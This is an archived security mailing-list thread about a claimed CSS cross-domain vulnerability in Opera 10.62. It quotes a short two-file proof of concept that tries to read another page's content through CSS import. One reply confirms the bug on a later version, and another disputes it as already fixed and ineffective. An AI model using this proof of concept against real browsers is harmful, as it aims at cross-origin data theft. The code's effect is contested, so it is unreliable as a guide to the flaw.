subject:"Re\: Opera Web Browser v10.62 \(CSS\) Cross Domain Vulnerability"

Re: Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability

2010-09-23 Thread phara0h

Works on Opera 10.70. Build 9049 for Linux, too.

On Thu, 23 Sep 2010 04:23:47 -0600
i...@securitylab.ir wrote:

> Proof Of Concept:
> 
> 1.html:
> 
> {}body{DOM:
> Cross Domain Vulnerability
> 
> 
> 2.html:
> 
> @import url("1.html");
> 
> 
> setTimeout(function(){
> var s = document.body.currentStyle.DOM;
> alert(s);
> },0);
> 
> 
> 
> 
> Vulnerable:
> Opera 10.62
> 
> 
> By: Securitylab.ir
> Original Advisory: http://Securitylab.ir/Advisories

Re: Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability

2010-09-24 Thread security

Opera's variation of this vulnerability was fixed back in Opera 10.10. The 
information on this thread is incorrect. The issue shown here does not affect 
Opera, and this code would not have produced an exploit in Opera, even in 
pre-10.10 versions. All it will do is display a message showing that the 
desired property is undefined, meaning that the exploit did not work.

Re: Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability

Re: Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability

2 matches

Site Navigation

Mail list logo

Footer information